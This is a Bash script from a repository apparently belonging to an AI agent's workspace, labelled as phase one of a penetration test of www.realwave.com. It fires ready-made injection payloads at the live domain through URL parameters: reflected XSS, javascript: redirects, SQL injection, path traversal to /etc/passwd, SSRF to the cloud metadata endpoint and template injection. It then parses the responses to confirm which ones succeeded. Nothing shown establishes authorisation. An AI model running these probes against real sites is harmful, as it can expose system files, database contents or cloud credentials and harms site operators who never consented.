jake/clawdbot-workspace
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
clawdbot-workspace/pentest-realwave/phase1-url-params.sh

43 lines
2.0 KiB
Bash
Executable File
Raw Blame History

#!/bin/bash
echo "=== PHASE 1: URL Parameter Injection ==="
echo ""
declare -A payloads
payloads["q_xss"]='https://www.realwave.com/?q=<script>alert(1)</script>'
payloads["redirect_js"]='https://www.realwave.com/?redirect=javascript:alert(1)'
payloads["callback_img"]='https://www.realwave.com/?callback=<img+src=x+onerror=alert(1)>'
payloads["search_svg"]='https://www.realwave.com/?search=<svg/onload=alert(1)>'
payloads["id_sqli"]='https://www.realwave.com/?id=1%27%20OR%201=1--'
payloads["page_lfi"]='https://www.realwave.com/?page=../../../../etc/passwd'
payloads["url_ssrf"]='https://www.realwave.com/?url=http://169.254.169.254/latest/meta-data/'
payloads["template_ssti"]='https://www.realwave.com/?template={{7*7}}'
for name in "${!payloads[@]}"; do
url="${payloads[$name]}"
echo "--- Test: $name ---"
echo "URL: $url"
response=$(curl -s -w "\n---HTTP_CODE:%{http_code}---\n---SIZE:%{size_download}---" -D - "$url" 2>&1)
http_code=$(echo "$response" | grep -o 'HTTP_CODE:[0-9]*' | cut -d: -f2)
headers=$(echo "$response" | sed '/^\r$/q')
body=$(echo "$response" | sed '1,/^\r$/d' | head -c 1000)
echo "HTTP Code: $http_code"
echo "Headers (key ones):"
echo "$headers" | grep -iE '(content-type|x-powered|server|x-frame|content-security|set-cookie|location)' || echo " (none matched)"
echo "Body (first 500 chars):"
echo "$body" | head -c 500
echo ""
# Check for reflection
if echo "$body" | grep -q '<script>alert(1)</script>'; then
echo "*** REFLECTED XSS DETECTED! Payload reflected unencoded! ***"
elif echo "$body" | grep -q '<img src=x onerror=alert(1)>'; then
echo "*** REFLECTED XSS DETECTED! IMG payload reflected! ***"
elif echo "$body" | grep -q '<svg/onload=alert(1)>'; then
echo "*** REFLECTED XSS DETECTED! SVG payload reflected! ***"
elif echo "$body" | grep -q '49'; then
echo " [CHECK] Possible SSTI - 49 found in response (could be {{7*7}} evaluated)"
fi
echo "========================================="
echo ""
done
Reference in New Issue View Git Blame Copy Permalink